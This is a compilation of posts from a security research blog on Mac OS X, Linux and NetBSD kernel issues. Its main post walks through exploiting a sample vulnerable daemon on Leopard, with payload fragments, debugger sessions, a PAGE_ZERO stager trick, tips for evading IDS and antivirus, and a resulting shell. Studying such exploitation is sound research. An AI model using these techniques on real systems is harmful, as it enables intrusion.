Several software vendors realized, sometime during the 1990-2000 timeframe,
that exporting system call tables within kernel address space was a bad idea.
This obviously doesn't mean anything to Red Hat and other GNU/Linux vendors
who are happily providing world-readable System.map files. Not
like anybody needs them, though.
Then again, you have to face potential funniness of contradictory measures,
like Apple's own mistakes. This article won't talk about yet another bug
introduced by a Linux developer working at Red Hat (and later silently fixed
by another employee of the very same company), but an interesting issue with
Mac OS X 10.4 systems on PowerPC.
Although the implementation of ptrace on Mac OS X is severely crippled,
Apple had time to add a nifty trick to prevent immediate debugging of certain
processes. Undocumented, it was obviously used only by Apple's own software, namely
iTunes and related applications. A private flag set by a process would disallow
future interaction with it via ptrace or other mechanisms, thus
causing the gdb debugger to fail when trying to attach to the target
process. It is a modern version of the good old trick first described publicly by
Silvio Cesare in one of his anti-debugging articles.
Apple, possibly with the intention of helping anti-piracy software vendors (in
their quest to preserve all that is good and just in the software industry and
beyond), added a KPI (Kernel Programming Interface) that lets a kernel extension
patch the ptrace system call. The sysent variable (the
BSD equivalent of the Linux sys_call_table, holding pointers, arguments
and other data of the supported system calls) is not exported
in any Mac OS X system, as a measure to prevent abuse (for example, in rootkits
and other malware subverting kernel-land code).
Therefore, there's no absolutely reliable method to patch the system call table
without resorting to hacks (even though these can be extremely reliable, they are
almost always tied to specific versions and/or architectures). Hence the existence
of temp_patch_ptrace. See the implementation of the function below:
/*
 * WARNING - this is a temporary workaround for binary compatibility issues
 * with anti-piracy software that relies on patching ptrace (3928003).
 * This KPI will be removed in the system release after Tiger.
 */
uintptr_t temp_patch_ptrace(uintptr_t new_ptrace)
{
    struct sysent * callp;
    sy_call_t * old_ptrace;

    if (new_ptrace == 0)
        return(0);

    enter_funnel_section(kernel_flock);
    callp = &sysent[26];
    old_ptrace = callp->sy_call;

    /* only allow one patcher of ptrace */
    if (old_ptrace == (sy_call_t *) ptrace) {
        callp->sy_call = (sy_call_t *) new_ptrace;
    }
    else {
        old_ptrace = NULL;
    }
    exit_funnel_section( );

    return((uintptr_t)old_ptrace);
}
It's not available on Leopard. The implications of this are fairly evident:
- A kernel extension can patch the ptrace system call without knowing the exact
  location of sysent.
- ptrace takes a good number of arguments, therefore providing a wide
  range of possibilities (as an exercise, think of a protocol based on ptrace
  which, upon a magic request argument, performs specific actions using a
  data buffer pointed to by the addr argument).
- The return value discloses the address of ptrace in kernel address
  space. If we wanted to locate sysent within a specific range of addresses,
  knowing the location of a system call will let us calculate an offset to the
  start of the structure (allowing verification against known values too).
So, why would Apple stop exporting the sysent structure and still
provide a function with the purpose of patching a system call? Why not export
sysent if a linear memory search is a trivial way to locate it
in memory (a technique historically used by Linux rootkits)?
Once again, the Linux kernel developers delight us with their always discreet (read: silent, no-advisory, no-warning policy) and wonderful patching practices. Sometime between 2.6.24 and 2.6.25 a patch from a Red Hat developer was committed into the Linux kernel git tree, implementing changes to the VMI interfaces hooking some functions dealing with the GDT and LDT.
diff --git a/arch/x86/kernel/vmi_32.c b/arch/x86/kernel/vmi_32.c
index 6ca515d..edfb09f 100644
--- a/arch/x86/kernel/vmi_32.c
+++ b/arch/x86/kernel/vmi_32.c
@@ -235,7 +235,7 @@ static void vmi_write_ldt_entry(struct desc_struct *dt, int entry,
const void *desc)
{
u32 *ldt_entry = (u32 *)desc;
- vmi_ops.write_idt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
+ vmi_ops.write_ldt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
}
static void vmi_load_sp0(struct tss_struct *tss,
It's not entirely clear if there's a reliable way to abuse this issue (since
data passed to sys_modify_ldt goes through several checks and might not
trigger the vulnerable code path right away). That said, the original commit mentions
that it was discovered when JRE caused failures. In addition, vmi_ops.write_idt_entry
might do further validation, thus reducing the issue to a mere denial of service in
the worst case. Also, it affects only x86 VMI guests.
After some time without any updates coming up, this article will show some techniques and strategies to improve the reliability of exploit code on Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at in the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (I co-authored the book with Kevin Finisterre).
Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only are they identified by IDS vendors, but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality into small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).
When using a stager, you might find a few different shortcomings that prevent your code from being reliable or effective against the widest span of architectures and platforms:
- malloc() or other allocators requires previous knowledge
  of their location within the address space.
- mlock is required.
vulnerabled is a (TCP based) network daemon which processes
incoming messages and seeks a callto:// handler. Then it reads
whatever is trailing after the handler string. Imagine this daemon is used
to connect to a VoIP solution that calls numbers provided by a crawler to
do phone spam or targeted advertisement.
The daemon properly reads the incoming message into a heap allocated buffer,
named tmpbuf. Its contents are zeroed every time the loop runs, therefore
making reliable usage of the buffer impossible on two consecutive runs if
tmpbuf points to the same address. A memory leak would help in
this situation, but there's none.
Afterwards, data is read from the incoming connection, into tmpbuf.
It NULL-terminates the buffer, but if tmpbuf address is overwritten,
a NULL byte will be written off-bounds. Such a situation could be useful in certain
cases, but we won't be looking into this particular possibility in depth for this
article; a single NULL byte write can indeed lead to arbitrary code execution, as
long as some requirements are met: here the offset will be equal to the length of
the data received from the client, thus we will need to send a payload of specific
length to match the offset (example: target address minus address of
tmpbuf) where we want our NULL to be injected.
char *tmpbuf = NULL;
char vulnbuf[265];
...
tmpbuf = malloc(8092);
...
while(1) {
    ...
    memset(vulnbuf, 0, sizeof(vulnbuf));
    ...
    if ((recvlen = recv(connfd, tmpbuf, 8092, 0)) != -1)
    {
        tmpbuf[recvlen] = '\0';
If the incoming data contains the handler string, it reads the trailing string
into the stack-based buffer named vulnbuf, which has a fixed size
of 265 bytes. A stack-based buffer overflow condition with a twist: we can abuse
variable ordering to mount a more sophisticated attack against vulnerabled.
Instead of a single packet payload, we will dedicate one packet to sending the main
payload and a second one to trigger it and subvert the execution flow in an elegant
manner. This will allow us to introduce the main topic of this article: creating
custom shellcode for evading security measures and improving the reliability of stagers.
        if ((recvlen > handlerlen) &&
            (!memcmp(tmpbuf, DEFAULT_HANDLER, handlerlen)))
        {
            ...
            memcpy(vulnbuf, tmpbuf+handlerlen, recvlen-handlerlen);
            fprintf(stdout, "received message: %s\n", vulnbuf);
        }

        if (recvlen > 4 && (tmpbuf[0] == '.') &&
            (tmpbuf[1] == 'e') && (tmpbuf[2] == 'n') &&
            (tmpbuf[3] == 'd'))
            break;
In the previous section we walked through the code of the sample vulnerable
daemon, reviewing the potentially exploitable security issues. Finally, we
suggested an elegant approach to abuse the issues for reliable code execution
against Apple Mac OS X Leopard 10.5.5. This section will explain said approach
thoroughly.
The layout of the attack is as follows:
callto://)mprotect() and pre-stager shellcodecallto://).end)
data += self.shellcode
data += self.random_string(265-len(self.shellcode))
data += self.random_string(4)
data += self.random_string(4)
data += struct.pack('<L', ebp_address)
heap_jumper = ''
heap_jumper += '.end'
heap_jumper += struct.pack('<L', 0x80000c)
You might have noticed that writing to EBP for overwriting saved EIP
requires us to write 4 bytes preceding the new EIP value. The length
of the end control message is... exactly 4 bytes. And that's the condition
that lets us abuse the variable ordering to point tmpbuf at
EBP directly and overwrite saved EIP correctly. The final payload is
copied by recv into EBP:
(gdb) p $ebp
$32 = (void *) 0xbffff888
(gdb) p tmpbuf
$33 = 0xbffff888 ".end\f"
(gdb) x/2x tmpbuf
0xbffff888: 0x646e652e 0x0080000c
(gdb) x/i 0x0080000c
0x80000c: nop
(gdb) p recvlen
$34 = 8
Note the address pointing to the heap buffer which was allocated initially.
Mac OS X has an absolutely predictable heap, fortunately for us and unfortunately
for end-user security. We have effectively overwritten a pointer address
to force the next recv call to write arbitrary data on EBP.
(gdb) c
Continuing.
vulnerabled(1654) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0080002b in ?? ()
(gdb) x/4i $eip
0x80002b: xor %eax,%eax
0x80002d: push %eax
0x80002e: push %eax
0x80002f: push $0x1012
(gdb) i f
Stack level 0, frame at 0xbffff888:
 eip = 0x80002b; saved eip 0xbf800000
 called by frame at 0x800032
 Arglist at 0xbffff880, args:
 Locals at 0xbffff880, Previous frame's sp is 0xbffff888
 Saved registers:
  ebp at 0xbffff880, eip at 0xbffff884
There's a catch: if the binary has been compiled with IBM's Stack Smashing Protector (SSP, formerly known as ProPolice), the arrangement of variables in memory will be different and we won't be able to reach the pointer from the stack-based buffer, thus rendering this approach impossible.
The custom shellcode explained here will use only a single
function from libSystem (the libc of sorts on OS X): mprotect.
It should be feasible to change memory protections using a different
method, but this is suitable for a re-spawning daemon since we can
bruteforce the dyld stub address.
It uses the mmap and mlock system calls, to
map memory at PAGE_ZERO (NULL, 0x00000000) and
lock pages to physical memory, respectively.
This is the first time that this technique appears publicly (specifically for
OS X). The Mach-O binary format defines a zeroed, unmapped memory segment
at position 0, named PAGE_ZERO. It remains unmapped under normal circumstances
to force exceptions on NULL dereference conditions (read/write to NULL, offset
from NULL when reading a member of a structure pointing at NULL, etc).
If we map PAGE_ZERO and set its permissions to read-write-execute, we will have
PAGE_SIZE bytes of space (4096 bytes on x86) for storing shellcode stages
and pretty much anything we could find useful. Side effects of mapping PAGE_ZERO
will be difficult to predict. Any future mistakes and programming errors
that dereference NULL or an offset from NULL won't raise an exception. Also,
if data is written there, our shellcode or data will be corrupted. Therefore,
for safety purposes, we might want to leave an initial set of bytes at NULL
unused (unchanged, thus zeroed). If data changes in the initial bytes, we
could raise an exception to emulate normal behavior, in case it's
been done as part of a test to detect our presence.
Mapping PAGE_ZERO will be clearly visible, and it's not subtle if it remains
mapped for a long time. Apparently the dyld loader and other operations
during Mach-O execution map the segment for a very short time.
The mprotect call produces the following results when executed within
the context of vulnerabled after successful exploitation, before execution
of the stager shellcode:
Stack bf800000-bffff000 [ 8188K] rwx/rwx SM=PRV
Stack bffff000-c0000000 [ 4K] rwx/rwx SM=COW thread 0
Stack [ 8192K]
And the mmap of PAGE_ZERO produces the following results (note the
initial unmapped state, and the different permissions afterwards, before the
final mprotect call):
Before mmap():
__PAGEZERO 00000000-00001000 [ 4K] ---/--- SM=NUL .../vulnerabled
__PAGEZERO [ 4K]
Before mprotect():
__PAGEZERO 00000000-00001000 [ 4K] rw-/rwx SM=NUL .../vulnerabled
After mprotect():
__PAGEZERO 00000000-00001000 [ 4K] rwx/rwx SM=NUL .../vulnerabled
Now our stager shellcode will be able to write data received from the attacking host to a writable and executable region at a static address, without requiring allocation using non-static locations.
Developing custom shellcode is trivial in most situations, although testing can
be tiresome. Mac OS X's lack of heap and mmap randomization is embarrassing,
and its layout has been repeatedly demonstrated to be easily predictable. Also, heap
memory permissions aren't enforced against execution (and read implies execute on Intel),
thus making the heap a safe bet for storing our shellcode and other data at runtime during
exploitation. ASLR in Leopard is incredibly weak, allowing trivial abuse of daemons
and applications re-spawning after an exception, and certain dyld ABI is still static.
Last but not least, the lack of general memory permissions enforcement allows regions
to be made executable, thus defeating the whole purpose of both ASLR and NX on OS X.
$ python vulnerabled_exploit.py -s 127.0.0.1 -p 6888
[+] Target vulnerabled at 127.0.0.1:6888 ...
[+] Running...
[+] Finished (shellcode was 152 bytes, 290 total).
[+] Check 127.0.0.1:6900 for shell.

(gdb) r
Starting program: ./vulnerabled
Reading symbols for shared libraries ++. done
Starting ./vulnerabled (pid: 2141, port: 6888)...
connection from 127.0.0.1
tmpbuf=0x800000 vulnbuf=0xbffff74b esp=0xbffff6f0
it's a good message! (282 bytes, 273 in data)
received message: ??????????1??R???
connection from 127.0.0.1
tmpbuf=0xbffff888 vulnbuf=0xbffff74b esp=0xbffff6f0
vulnerabled(2141) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x8fe01010 in __dyld__dyld_start ()
(gdb) c
Continuing.
Reading symbols for shared libraries .. done

$ nc 127.0.0.1 6900
id
uid=501(myuser) gid=20(staff) groups=20(staff),98(_lpadmin), ...
Apparently someone, in his glaring innocence, is playing around with Apache. Possibly we should start looking at mod_python or maybe mod_ssl. Maybe we can just let RBAC and PaX take care of it. But abuse departments are extremely responsive these days! One wonders what these people think when they have their DSL lines shut down.
Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]
Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]
Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]
Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]
Sep 8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28922]
The grand official Idiot of the Month, for your amusement. You might find it useful to add his IP range to your preferred spam blacklist as well. And another prop to spender for the brute force prevention feature of grsecurity, which makes exploiting re-spawning daemon vulnerabilities a hell more boring and futile. Especially when you have 40 bits of ASLR on your side. Yikes!
OrgName: Road Runner HoldCo LLC
OrgID: RRMA
Address: 13241 Woodland Park Road
City: Herndon
StateProv: VA
PostalCode: 20171
Country: US
ReferralServer: rwhois://ipmt.rr.com:4321
NetRange: 65.184.0.0 - 65.191.255.255
CIDR: 65.184.0.0/13
NetName: RR
NetHandle: NET-65-184-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.RR.COM
NameServer: DNS2.RR.COM
NameServer: DNS3.RR.COM
NameServer: DNS4.RR.COM
Comment:
RegDate: 2004-04-07
Updated: 2005-05-16
OrgAbuseHandle: ABUSE10-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-703-345-3416
OrgAbuseEmail: abuse@rr.com
OrgTechHandle: IPTEC-ARIN
OrgTechName: IP Tech
OrgTechPhone: +1-703-345-3416
OrgTechEmail: abuse@rr.com
The .NET framework provides a Marshal class from its Runtime.InteropServices namespace which helps interfacing native and unmanaged data with managed code. The easy path for most of these cases is to simply use unsafe blocks and cast a pointer, but you end up losing references to allocated structures, leaking memory and likely leaving some funny exploitable condition in your unmanaged code bridge. Those pesky dangling pointers...
The function below calls an internal method to retrieve the list of loaded
kernel modules from userland. It depends on NtQuerySystemInformation()
and requires a heap-allocated structure array. Interfacing this with a C# managed
class will require another exported function to call HeapFree() and
release the allocated memory.
Using such an approach is certainly not recommended but it will cut you some hassle:
extern "C" __declspec(dllexport) PSYSTEM_MODULE_INFORMATION GetKernelModules(void)
{
    HANDLE tmpHeap = GetProcessHeap();
    PSYSTEM_MODULE_INFORMATION modList = NULL;

    LoadFunctionPointers();
    _getSysModules(&modList, tmpHeap);

    return modList;
}

extern "C" __declspec(dllexport) void MyFreeHeap(LPVOID ptrToFree)
{
    HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, ptrToFree);
}
On the C# side, we will be using a Marshal structure declaration in order to be
able to use the PtrToStructure method, which allows us to copy memory from
unmanaged space into our managed class, and then we can release whatever memory
was allocated for the native API.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 2)]
public struct SYSTEM_MODULE_INFORMATION
{
    [MarshalAs(UnmanagedType.U4)] public UInt32 Reserved1;
    [MarshalAs(UnmanagedType.U4)] public UInt32 Reserved2;
    ...
}

// Copy the i-th unmanaged entry into its managed counterpart.
// ToInt64() keeps the pointer arithmetic valid in 64-bit processes as well.
int curOffset = (int)(i * Marshal.SizeOf(Modules[i]));
IntPtr curPtr = new IntPtr(ModulesListPtr.ToInt64() + curOffset);
Modules[i] = (SYSTEM_MODULE_INFORMATION) Marshal.PtrToStructure(curPtr,
    typeof(SYSTEM_MODULE_INFORMATION));

[DllImport("mylib.dll", CharSet = CharSet.Unicode)]
private extern static void MyFreeHeap(IntPtr ptr);
Depending on your target platform, you might want to adjust CharSet
since Unicode is the default on NT based systems (that is, all modern versions of
Windows, excluding 9x/ME if you consider them modern... although in terms of
security, it seems like Windows 98 is safer, after all, most malware doesn't work
on it anymore). Packing is also important, since it determines how your structure is
actually laid out in memory. Values of 1-2 are safe, just verify the alignment of
the variables within the structure you are trying to use.
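To make the packing remark concrete, here is a minimal sketch in Python (not part of the original C# bridge) using the standard struct module. The two-field record, a 1-byte flag followed by a 4-byte value, is purely hypothetical and is not the real SYSTEM_MODULE_INFORMATION layout. It shows that a packed layout and a natively aligned one usually differ in size, and that walking an array by i * size only works when both sides agree on the layout.

```python
import struct

# Hypothetical record: 1-byte flag followed by a 4-byte unsigned value.
PACKED = struct.Struct("<BI")   # no padding between fields (like Pack = 1)
NATIVE = struct.Struct("@BI")   # native alignment, padding usually inserted


def read_records(buf, count, layout):
    """Read `count` consecutive records from `buf`, stepping by layout.size."""
    records = []
    for i in range(count):
        offset = i * layout.size            # same idea as i * Marshal.SizeOf(...)
        records.append(layout.unpack_from(buf, offset))
    return records


# Build three packed records, as a native library using 1-byte packing might.
buf = b"".join(PACKED.pack(i, 0x1000 * i) for i in range(3))

print("packed size:", PACKED.size, "native size:", NATIVE.size)
print(read_records(buf, 3, PACKED))
```

Reading the same buffer with the NATIVE layout would step by the wrong size and decode the wrong bytes, which is the kind of mismatch a wrong Pack value produces on the managed side.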
Some suggestions:
- Free unmanaged allocations through a P/Invoke or similar method that itself
  works with HeapFree within your DLL bridge library. You could also use
  Marshal.AllocHGlobal.
- Use GCHandle when you need to write data from your unmanaged
  code directly, and remember to release it once you are done with it. But
  never overwrite the address of a managed object or you will
  end up hitting an invalid free whenever the GC attempts to release your now
  corrupted object. And that might happen in a manner that makes debugging a
  pain in the ass. Better go clubbing than waste your time debugging that.

One may think that vulnerabilities can't get any more stupid, but there's always an Apple advisory to beat the record. A setuid Emacs binary? Seems like a plan. (From APPLE-SA-2008-07-31 and CVE-2008-2324).
Disk Utility
CVE-ID: CVE-2008-2324
Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11
Impact: A local user may obtain system privileges
Description: The "Repair Permissions" tool in Disk Utility makes /usr/bin/emacs setuid. After the Repair Permissions tool has been run, a local user may use emacs to run commands with system privileges. This update addresses the issue by correcting the permissions applied to emacs in the Repair Permissions tool. This issue does not affect systems running Mac OS X v10.5 and later. Credit to Anton Rang and Brian Timares for reporting this issue.
The "Repair Permissions" tool should have been removed from Mac OS X a long time ago.
Running our custom pyblosxom engine with mod_wsgi and the Apache disk-based cache enabled currently yields roughly 170 requests per second, measured on 6th September 2008 with 50 concurrent requests and a total of 1000 requests against the index page.
There are some potential improvements, and lighttpd or a similar high-performance webserver could probably beat these numbers by a few thousand requests per second. We will likely test such a setup in the future. In our tests, lighttpd itself can handle around 1012.06 requests per second for a lightweight PHP script served over FastCGI with no database backend.
Server Software: Apache
Server Hostname: blog.subreption.com
Server Port: 80
Document Path: /hub
Document Length: 24112 bytes
Concurrency Level: 50
Time taken for tests: 5.882 seconds
Complete requests: 1000
Failed requests: 0
Write errors: 0
Total transferred: 24289000 bytes
HTML transferred: 24112000 bytes
Requests per second: 170.02 [#/sec] (mean)
Time per request: 294.088 [ms] (mean)
Time per request: 5.882 [ms] (mean, across all concurrent requests)
Transfer rate: 4032.75 [Kbytes/sec] received
Connection Times (ms)
min mean[+/-sd] median max
Connect: 0 0 0.2 0 1
Processing: 17 287 51.1 299 490
Waiting: 16 286 51.2 298 490
Total: 18 287 51.0 299 491
Percentage of the requests served within a certain time (ms)
50% 299
66% 313
75% 321
80% 325
90% 338
95% 351
98% 368
99% 375
100% 491 (longest request)
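As a quick sanity check, the headline figures of the report above can be rederived from three inputs: total requests, concurrency and elapsed time. The sketch below is ours, in Python, and is not part of the ab tool. It assumes the usual relationships (throughput is requests over time, mean time per request is concurrency times elapsed time over requests), and the small differences from the report come from ab using an unrounded elapsed time.

```python
def benchmark_summary(requests, concurrency, elapsed_s, total_bytes):
    """Recompute the main ApacheBench-style figures from raw totals."""
    rps = requests / elapsed_s
    # Mean latency seen by one client while `concurrency` requests are in flight.
    per_request_ms = concurrency * elapsed_s / requests * 1000.0
    # Mean time across all concurrent requests (inverse of throughput).
    across_all_ms = elapsed_s / requests * 1000.0
    transfer_kb_s = total_bytes / 1024.0 / elapsed_s
    return rps, per_request_ms, across_all_ms, transfer_kb_s


# Values copied from the report above.
rps, per_req, across, rate = benchmark_summary(1000, 50, 5.882, 24289000)
print("%.2f req/s, %.1f ms, %.3f ms, %.1f KB/s" % (rps, per_req, across, rate))
```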
Finally the blog is back, after many changes in the infrastructure behind the scenes. The most important move was removing PHP support from our servers and migrating away from WordPress as our blogging engine. Unfortunately, the current state of security for web applications developed with PHP, and of the language itself, is simply not acceptable for most people with above average security requirements.
- preg_replace() calls.
- mod_php itself is a memory blackhole. Only FastCGI
  environments can provide a minimally acceptable level of security when it
  comes down to privilege separation and memory address space isolation.
  As an example, check how mod_php lets a PHP script access
  Apache's file descriptors. It's just stupid.

We are now running on a full Python and Ruby infrastructure with isolated jails and a few critical services virtualized. PaX and grsecurity RBAC policies provide the necessary functionality to ensure that every process is locked down properly. Besides, PaX on 64-bit processors provides a whopping 40-bit ASLR entropy :).
Finally, a free alternative to the insanely expensive BinDiff by Zynamics (formerly known as Sabre Security). It's been developed by Tenable Security (the people behind Nessus nowadays), and requires IDA Pro 5.2 on Windows.
Get PatchDiff 2 and give it a try; it's looking good so far. That said, its graphing capabilities aren't as nice as BinDiff's, and it may lack some features, although that is possibly compensated by the difference between the 1330 USD of a BinDiff license and the 0 USD of Tenable Security's free alternative.
Alright, this might be the first article in the "Silent Patches" series, starting today and possibly lasting... forever. So, let's get down to business. Brad "spender" Spengler is pissed, and that's already a bad thing for the many people who, knowingly or not, take advantage of his work and that of the guy or guys behind PaX, to be referred to as The PaX Team, or Those Smart Guys Teaching Security On LKML.
spender and the PaX Team have possibly contributed the most important advances in proactive defense technology for the past decade. ASLR was there before it became a marketing buzzword, NX and memory protections enforcement existed way before Red Hat pushed ExecShield to the Linux kernel and TCP & UDP source port randomization have been known for a while (even though now they seem to be the world's new internet superheroes with all this DNS the-end-is-nigh media frenzy).
If you have used grsecurity in the past few years, you've used what Microsoft, Apple and Red Hat pretended to market as brand new technology baked in their very own development cubicles.
The story now is how the Linux kernel developers managed to absolutely and irremediably piss off the very same people that fed them with security research and technology that really worked as expected. The very same people that have patched upstream vulnerabilities in their "third-party patches".
Back in 2005 (see [1]) this was already happening. The fact that now we have a handy git interface where we can retrieve commit logs without difficulty just helps to pinpoint the silently patched issues and identify potentially hot issues.
Our take on this fracas is that spender and the PaX Team are rock-solid consistent in their arguments, and that the Linux kernel developers should definitely replace their alleged full-disclosure policy text with one that accurately reflects their true practices.
When CVE-2007-0015 was published by the Month of Apple Bugs team, their exploit used a QTL Quicktime playlist file for triggering the bug. Whether their decision was meant to prevent the exploit from being used "en masse" or simply to test a different, less classic attack vector, it's still worth noting that it could have worked far more efficiently via Safari, since Quicktime supports embedding playlist files and the Safari process address space would be easily subverted to ensure a higher degree of reliability when executing our payload.
Sometimes it's good to remember old flaws, and improve old exploit code. Sometimes it's even better to use new attack vectors on old flaws, too.
This is nothing new, and it's strictly what the POSIX
specification warns about mlock() & munlock().
As you may already know, mlock() locks memory to prevent it from
being swapped to disk (for example, if you require cryptographic secrets such as
encryption keys to stay memory-resident during system stress, preventing
them from persisting on disk and other media). munlock() does exactly the
opposite: it unlocks memory.
The problem is that both functions don't necessarily work in the same manner across different implementations. The address parameter to both might be required to be page-aligned (a multiple of the memory page size, for example 4096 bytes on x86).
What happens if we supply a non-page-aligned memory address? If the
implementation rounds to page boundaries by default, we will be either locking
or unlocking a whole page, if we use mlock() or munlock()
respectively. That means all the memory contents within the same page will be
affected. This might not be an issue during locking, but when you are unlocking,
it's a different situation... we might expose data that was supposed to remain
locked and compromise other secrets.
The only solution to this issue is to have a consensus between vendors and implement the same behavior. That, or design and develop your own secure memory pool :) !
To illustrate this post, you can see below the implementation for Mac OS X Leopard (10.5):
int
mlock(__unused proc_t p, struct mlock_args *uap, __unused register_t *retvalval)
{
    vm_map_t user_map;
    vm_map_offset_t addr;
    vm_map_size_t size, pageoff;
    kern_return_t result;

    ...

    addr = (vm_map_offset_t) uap->addr;
    size = (vm_map_size_t)uap->len;

    /* disable wrap around */
    if (addr + size < addr)
        return (EINVAL);

    if (size == 0)
        return (0);

    pageoff = (addr & PAGE_MASK);
    addr -= pageoff;
    size = vm_map_round_page(size+pageoff);
    user_map = current_map();
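The rounding performed by the last few lines of the excerpt can be replayed outside the kernel. The following is a small Python sketch of the same arithmetic, assuming a 4096-byte page. The addresses are made up for illustration, and round_page is our stand-in for vm_map_round_page. It shows how a request covering a 32-byte key ends up covering the whole page, including an unrelated secret that happens to live there.

```python
PAGE_SIZE = 4096            # assumed page size (x86), as mentioned in the text
PAGE_MASK = PAGE_SIZE - 1


def round_page(size):
    """Round size up to the next multiple of PAGE_SIZE (stand-in for vm_map_round_page)."""
    return (size + PAGE_MASK) & ~PAGE_MASK


def affected_range(addr, size):
    """Return (start, length) of the region actually locked or unlocked."""
    pageoff = addr & PAGE_MASK          # offset of addr inside its page
    start = addr - pageoff              # address rounded down to the page start
    length = round_page(size + pageoff)
    return start, length


# Hypothetical layout: a 32-byte key at 0x1010, another secret at 0x1800.
key_addr, key_len = 0x1010, 32
other_secret = 0x1800

start, length = affected_range(key_addr, key_len)
print(hex(start), length)
print("other secret affected:", start <= other_secret < start + length)
```

With this behavior, an munlock() call on the key also unlocks the neighbouring secret, which is exactly the exposure described above.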

We haven't been abducted, yet. While working on an interesting research project, we found something about Apple's Kernel Authorization framework that might be a bit odd. From their documentation:
When writing a vnode scope listener, be aware that not every file
system operation will trigger an authorization request. For example, if an actor
successfully requests KAUTH_VNODE_SEARCH on a directory, the system
may cache that result and grant future requests without
invoking your listener for each one.
Although we haven't verified this any further, it's at the very least interesting. Does that mean that a security decision might be cached and applied again under potentially different circumstances? Huh. It's true that a vnode scope listener can be one hell of a performance black-hole, but race conditions due to cached decisions are worse than slowing down file system operations, especially if the module overrides other policies.
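To illustrate the concern, here is a toy model in Python. It is not the KAuth API and makes no claim about how Apple's cache actually works; the CachingAuthorizer class, the listener function and the policy dictionary are all hypothetical. It only shows the general hazard: once a decision is cached, a later policy change is never consulted for the same request.

```python
class CachingAuthorizer:
    """Toy authorizer that remembers decisions per (actor, action, path)."""

    def __init__(self, listener):
        self._listener = listener
        self._cache = {}
        self.listener_calls = 0

    def authorize(self, actor, action, path):
        key = (actor, action, path)
        if key not in self._cache:
            # Only the first request for this key reaches the listener.
            self.listener_calls += 1
            self._cache[key] = self._listener(actor, action, path)
        return self._cache[key]


policy = {"allow_search": True}


def listener(actor, action, path):
    """Hypothetical listener that consults the current policy."""
    return policy["allow_search"]


auth = CachingAuthorizer(listener)
first = auth.authorize("uid501", "search", "/private")
policy["allow_search"] = False      # circumstances change...
second = auth.authorize("uid501", "search", "/private")
print(first, second, auth.listener_calls)
```

The second request is still granted even though the policy now denies it, and the listener was invoked only once.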
We've been talking to a kernel developer of the NetBSD project (probably the most portable
operating system out there), regarding its security status and some potential
enhancements.
While reading through the secmodel
securelevel source, we spotted this interesting snippet:
case KAUTH_REQ_SYSTEM_TIME_SYSTEM: {
    struct timespec *ts = arg1;
    struct timeval *delta = arg2;

    /*
     * Don't allow the time to be set forward so far it will wrap
     * and become negative, thus allowing an attacker to bypass
     * the next check below. The cutoff is 1 year before rollover
     * occurs, so even if the attacker uses adjtime(2) to move
     * the time past the cutoff, it will take a very long time
     * to get to the wrap point.
     *
     * XXX: we check against INT_MAX since on 64-bit
     * platforms, sizeof(int) != sizeof(long) and
     * time_t is 32 bits even when atv.tv_sec is 64 bits.
     */
    if (securelevel > 1 &&
        ((ts->tv_sec > INT_MAX - 365*24*60*60) ||
         (delta->tv_sec < 0 || delta->tv_usec < 0)))
        result = KAUTH_RESULT_DENY;
    break;
}
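The condition in the snippet is easier to reason about when restated outside the kernel. Below is a minimal Python restatement of that single check, assuming a 32-bit INT_MAX. The function name and the sample timestamps are ours, and the sketch ignores everything else the secmodel does.

```python
INT_MAX = 2**31 - 1                 # assumed 32-bit int, as in the XXX comment
ONE_YEAR = 365 * 24 * 60 * 60       # the cutoff used by the snippet, in seconds


def time_change_denied(securelevel, new_tv_sec, delta_tv_sec, delta_tv_usec):
    """Mirror of the check above: True when the request would be denied."""
    if securelevel <= 1:
        return False
    too_close_to_wrap = new_tv_sec > INT_MAX - ONE_YEAR
    backwards = delta_tv_sec < 0 or delta_tv_usec < 0
    return too_close_to_wrap or backwards


# Sample requests at securelevel 2 (timestamps are arbitrary examples).
print(time_change_denied(2, 1220000000, 5, 0))               # small step forward
print(time_change_denied(2, 1220000000, -1, 0))              # stepping backwards
print(time_change_denied(2, INT_MAX - ONE_YEAR + 1, 0, 0))   # inside the cutoff
```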
Even if time for keeping this blog updated is becoming rather scarce, we couldn't resist publishing a note about Quicktime again. It was in the news some time ago, due to another simple, classical stack buffer overflow flaw. It was related to RTSP interfaces again.
Our exploit pack already provides a reliable exploit against this and other recent flaws, and there's no real exploit for this flaw publicly available (in terms of quality and reliability). It's quite possible that so-called drive-by malware installation kits are making use of this flaw to infect unsuspecting users.
We expected Apple to perform some due diligence with Quicktime's QA, since the last real 1990-style flaws have all been related to RTSP functionality, but it looks like they are still missing some guidance. Hopefully it won't take long for them to realize that something like SDL could significantly improve their product security.
Subreption blog by Subreption LLC is Licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0
United States License.